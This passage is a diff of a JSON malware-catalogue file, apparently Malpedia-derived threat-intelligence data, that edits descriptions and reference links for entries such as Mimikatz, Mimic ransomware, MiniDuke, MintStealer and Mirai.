+ "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf"
],
"synonyms": [],
"type": []
@@ -31964,147 +33699,172 @@
"value": "Milum"
},
{
- "description": "Varonis summarizes Mimikatz as an open-source application that allows users to view and save authentication credentials like Kerberos tickets. Benjamin Delpy continues to lead Mimikatz developments, so the toolset works with the current release of Windows and includes the most up-to-date attacks.\r\n\r\nAttackers commonly use Mimikatz to steal credentials and escalate privileges: in most cases, endpoint protection software and anti-virus systems will detect and delete it. Conversely, pentesters use Mimikatz to detect and exploit vulnerabilities in your networks so you can fix them.",
+ "description": "",
"meta": {
"refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz",
- "https://www.accenture.com/us-en/blogs/security/ransomware-hades",
- "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia",
- "https://www.welivesecurity.com/2022/09/06/worok-big-picture/",
- "https://www.secureworks.com/research/samsam-ransomware-campaigns",
- "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
- "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/",
- "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle",
- "http://www.secureworks.com/research/threat-profiles/gold-kingswood",
- "https://www.hvs-consulting.de/lazarus-report/",
- "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/",
- "https://paraflare.com/attack-lifecycle-detection-of-an-operational-technology-breach/",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-152a",
- "https://unit42.paloaltonetworks.com/atoms/obscureserpens/",
- "https://assets.virustotal.com/reports/2021trends.pdf",
- "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics",
- "https://www.theta.co.nz/news-blogs/cyber-security-blog/snakes-ladders-the-offensive-use-of-python-on-windows/",
- "https://attack.mitre.org/groups/G0011",
- "https://attackiq.com/2022/06/03/attack-graph-response-to-us-cert-aa22-152a-karakurt-data-extortion-group/",
- "http://www.secureworks.com/research/threat-profiles/gold-drake",
- "https://ics-cert.kaspersky.com/media/KASPERSKY_Steganography_in_targeted_attacks_EN.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection",
- "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html",
- "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
- "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/",
- "https://noticeofpleadings.com/nickel/#",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
- "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
- "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks",
- "https://www.secureworks.com/research/threat-profiles/gold-drake",
- "https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/",
- "https://attack.mitre.org/groups/G0096",
- "http://www.secureworks.com/research/threat-profiles/gold-franklin",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe/",
- "https://www.infinitumit.com.tr/apt-35/",
- "https://blog.xpnsec.com/exploring-mimikatz-part-1/",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-152A_Karakurt_Data_Extortion_Group.pdf",
- "https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153",
- "https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/",
- "https://www.ic3.gov/Media/News/2021/210527.pdf",
- "https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/",
- "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
- "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/",
- "https://www.ic3.gov/media/news/2020/200917-1.pdf",
- "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
- "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta",
- "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom",
- "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html",
- "https://twitter.com/swisscom_csirt/status/1354052879158571008",
- "https://github.com/gentilkiwi/mimikatz",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis",
- "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
- "https://securelist.com/the-sessionmanager-iis-backdoor/106868/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-campaign-telecoms-asia-middle-east",
- "https://www.verfassungsschutz.de/download/broschuere-2021-01-bfv-cyber-brief-2021-01.pdf",
- "https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
- "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html",
- "https://attack.mitre.org/groups/G0034",
- "https://www.secureworks.com/research/threat-profiles/gold-kingswood",
- "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html",
- "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks",
- "https://www.secureworks.com/research/threat-profiles/cobalt-hickman",
- "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/",
- "https://www.crowdstrike.com/blog/overwatch-elite-call-escalation-vital-to-containing-attack/",
- "https://www.matteomalvica.com/blog/2020/01/30/mimikatz-lsass-dump-windg-pykd/",
- "https://www.slideshare.net/yurikamuraki5/active-directory-240348605",
- "https://www.rsa.com/content/dam/en/white-paper/the-shadows-of-ghosts-carbanak-report.pdf",
- "https://volatility-labs.blogspot.com/2021/10/memory-forensics-r-illustrated.html",
- "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations",
- "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
- "https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_Intel_WP_InitAccess-IndEnvirons-Final.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
- "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730",
- "https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html",
- "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
- "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-vinewood",
- "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf",
- "https://www.secureworks.com/blog/ransomware-deployed-by-adversary",
- "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf",
- "https://www.varonis.com/blog/hive-ransomware-analysis",
- "https://www.accenture.com/us-en/blogs/cyber-defense/double-extortion-campaigns",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021",
- "https://www.microsoft.com/security/blog/2021/11/18/iranian-targeting-of-it-sector-on-the-rise/",
- "https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east",
- "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/",
- "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
- "https://www.infinitumit.com.tr/en/conti-ransomware-group-behind-the-karakurt-hacking-team/",
- "https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices/",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran",
- "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
- "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html",
- "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/",
- "https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/",
- "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html",
- "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
- "https://www.f-secure.com/content/dam/f-secure/en/consulting/our-thinking/collaterals/digital/f-secure-consulting-incident-readiness-proactive-response-guide-2020.pdf",
- "https://www.ic3.gov/Media/News/2021/210823.pdf",
- "http://www.secureworks.com/research/threat-profiles/gold-burlap",
- "https://twitter.com/inversecos/status/1456486725664993287",
- "https://labs.f-secure.com/blog/catching-lazarus-threat-intelligence-to-real-detection-logic-part-two",
- "https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf",
- "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mim221",
+ "https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "83ebded5-6ce5-471a-9bfe-db7cca6b3756",
+ "value": "mim221"
+ },
+ {
+ "description": "According to PCrisk, Mimic is a ransomware-type program. Malware within this classification is designed to encrypt data and demand ransoms for decryption. Evidence suggests that Mimic is based on the leaked CONTI ransomware builder. Mimic campaigns have been observed targeting English and Russian speaking users.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimic",
+ "https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "40e57c70-c83b-4820-87fd-f684f4960268",
+ "value": "Mimic Ransomware"
+ },
+ {
+ "description": "Varonis summarizes Mimikatz as an open-source application that allows users to view and save authentication credentials like Kerberos tickets. Benjamin Delpy continues to lead Mimikatz developments, so the toolset works with the current release of Windows and includes the most up-to-date attacks.\r\n\r\nAttackers commonly use Mimikatz to steal credentials and escalate privileges: in most cases, endpoint protection software and anti-virus systems will detect and delete it. Conversely, pentesters use Mimikatz to detect and exploit vulnerabilities in your networks so you can fix them.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
+ "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/",
+ "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html",
+ "https://www.crowdstrike.com/blog/overwatch-elite-call-escalation-vital-to-containing-attack/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks",
+ "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations",
+ "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/",
+ "http://www.secureworks.com/research/threat-profiles/gold-kingswood",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://attackiq.com/2022/06/03/attack-graph-response-to-us-cert-aa22-152a-karakurt-data-extortion-group/",
+ "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
+ "https://www.mandiant.com/resources/blog/alphv-ransomware-backup",
+ "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices/",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "https://blog.xpnsec.com/exploring-mimikatz-part-1/",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-hickman",
+ "https://www.infinitumit.com.tr/apt-35/",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east",
+ "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
+ "https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/",
+ "https://www.ic3.gov/Media/News/2021/210823.pdf",
+ "http://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
+ "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-152a",
+ "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
+ "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta",
+ "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html",
+ "https://www.ic3.gov/media/news/2020/200917-1.pdf",
+ "https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://twitter.com/inversecos/status/1456486725664993287",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021",
+ "https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_Intel_WP_InitAccess-IndEnvirons-Final.pdf",
+ "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis",
+ "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html",
+ "https://www.ic3.gov/Media/News/2021/210527.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://www.theta.co.nz/news-blogs/cyber-security-blog/snakes-ladders-the-offensive-use-of-python-on-windows/",
+ "https://attack.mitre.org/groups/G0011",
+ "https://www.matteomalvica.com/blog/2020/01/30/mimikatz-lsass-dump-windg-pykd/",
+ "https://asec.ahnlab.com/ko/39682/",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-152A_Karakurt_Data_Extortion_Group.pdf",
+ "https://attack.mitre.org/groups/G0034",
+ "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf",
+ "https://www.intrinsec.com/apt27-analysis/",
+ "https://www.verfassungsschutz.de/download/broschuere-2021-01-bfv-cyber-brief-2021-01.pdf",
+ "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
+ "https://noticeofpleadings.com/nickel/#",
+ "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/",
+ "https://www.varonis.com/blog/hive-ransomware-analysis",
+ "https://www.infinitumit.com.tr/en/conti-ransomware-group-behind-the-karakurt-hacking-team/",
+ "https://github.com/gentilkiwi/mimikatz",
+ "https://securelist.com/the-sessionmanager-iis-backdoor/106868/",
+ "https://volatility-labs.blogspot.com/2021/10/memory-forensics-r-illustrated.html",
+ "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/",
+ "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/",
+ "https://attack.mitre.org/groups/G0096",
+ "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
+ "http://www.secureworks.com/research/threat-profiles/gold-burlap",
+ "https://unit42.paloaltonetworks.com/atoms/obscureserpens/",
+ "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
+ "https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/",
+ "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains",
+ "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
+ "https://www.secureworks.com/research/threat-profiles/gold-kingswood",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom",
+ "https://www.hvs-consulting.de/lazarus-report/",
+ "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle",
+ "http://www.secureworks.com/research/threat-profiles/gold-franklin",
+ "https://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks",
+ "https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
+ "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
+ "https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe/",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-campaign-telecoms-asia-middle-east",
+ "https://www.secureworks.com/blog/ransomware-deployed-by-adversary",
+ "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran",
+ "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis",
+ "https://www.rsa.com/content/dam/en/white-paper/the-shadows-of-ghosts-carbanak-report.pdf",
+ "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
+ "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html",
+ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf",
+ "https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
+ "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel",
+ "https://www.secureworks.com/research/samsam-ransomware-campaigns",
+ "https://assets.virustotal.com/reports/2021trends.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage",
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
+ "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/",
+ "https://www.slideshare.net/yurikamuraki5/active-directory-240348605",
+ "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection",
+ "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf",
+ "https://ics-cert.kaspersky.com/media/KASPERSKY_Steganography_in_targeted_attacks_EN.pdf",
+ "https://www.f-secure.com/content/dam/f-secure/en/consulting/our-thinking/collaterals/digital/f-secure-consulting-incident-readiness-proactive-response-guide-2020.pdf",
+ "https://paraflare.com/attack-lifecycle-detection-of-an-operational-technology-breach/",
+ "https://www.microsoft.com/security/blog/2021/11/18/iranian-targeting-of-it-sector-on-the-rise/",
+ "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html",
+ "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/",
+ "https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf",
+ "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics",
+ "https://labs.f-secure.com/blog/catching-lazarus-threat-intelligence-to-real-detection-logic-part-two",
+ "https://www.secureworks.com/research/threat-profiles/bronze-vinewood",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/double-extortion-campaigns",
+ "https://twitter.com/swisscom_csirt/status/1354052879158571008",
+ "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
+ "https://unit42.paloaltonetworks.com/trigona-ransomware-update/",
+ "https://www.accenture.com/us-en/blogs/security/ransomware-hades",
+ "https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger",
+ "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf",
+ "https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/",
+ "https://www.welivesecurity.com/2022/09/06/worok-big-picture/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "7f3a035d-d83a-45b8-8111-412aa8ade802",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "588fb91d-59c6-4667-b299-94676d48b17b",
"value": "MimiKatz"
},
@@ -32126,12 +33886,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.minebridge",
- "https://blog.morphisec.com/minebridge-on-the-rise-sophisticated-delivery-mechanism",
+ "https://www.bleepingcomputer.com/news/security/windows-finger-command-abused-by-phishing-to-download-malware/",
"https://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures",
"https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html",
- "https://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat",
+ "https://blog.morphisec.com/minebridge-on-the-rise-sophisticated-delivery-mechanism",
"https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/",
- "https://www.bleepingcomputer.com/news/security/windows-finger-command-abused-by-phishing-to-download-malware/"
+ "https://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat"
],
"synonyms": [
"GazGolder"
@@ -32151,31 +33911,23 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "ea9c7068-1c28-4826-a7d1-7ac04760e5c9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a4f8bacf-2076-4e00-863c-874cdd833a41",
"value": "MiniASP"
},
{
- "description": "",
+ "description": "The MiniDuke toolset consists of multiple downloader and backdoor components",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.miniduke",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://cybergeeks.tech/how-to-defeat-the-russian-dukes-a-step-by-step-analysis-of-miniduke-used-by-apt29-cozy-bear/",
"https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/",
"https://www.circl.lu/files/tr-14/circl-analysisreport-miniduke-stage3-public.pdf",
- "https://www.secureworks.com/research/threat-profiles/iron-hemlock",
"https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
+ "https://research.checkpoint.com/2022/native-function-and-assembly-code-invocation/",
"https://www.fireeye.com/blog/threat-research/2013/02/its-a-kind-of-magic-1.html",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
"https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/",
- "https://cybergeeks.tech/how-to-defeat-the-russian-dukes-a-step-by-step-analysis-of-miniduke-used-by-apt29-cozy-bear/"
+ "https://www.secureworks.com/research/threat-profiles/iron-hemlock"
],
"synonyms": [],
"type": []
@@ -32196,6 +33948,19 @@
"uuid": "01e605b0-aadc-40a3-986f-f0795fd20401",
"value": "MiniStealer"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mintstealer",
+ "https://twitter.com/ViriBack/status/1610393842787704835"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "15c036d3-e1d8-4e4a-850c-20ce65bdd24c",
+ "value": "MintStealer"
+ },
{
"description": "",
"meta": {
@@ -32203,8 +33968,8 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage",
"https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf",
"https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/",
- "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-palace"
+ "https://www.secureworks.com/research/threat-profiles/bronze-palace",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf"
],
"synonyms": [],
"type": []
@@ -32230,16 +33995,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai",
- "https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/",
- "https://unit42.paloaltonetworks.com/moobot-d-link-devices/",
- "https://dev.azure.com/Mastadamus/Mirai%20Botnet%20Analysis/_wiki/wikis/Mirai-Botnet-Analysis.wiki/12/Anatomy-of-An-Mirai-Botnet-Attack",
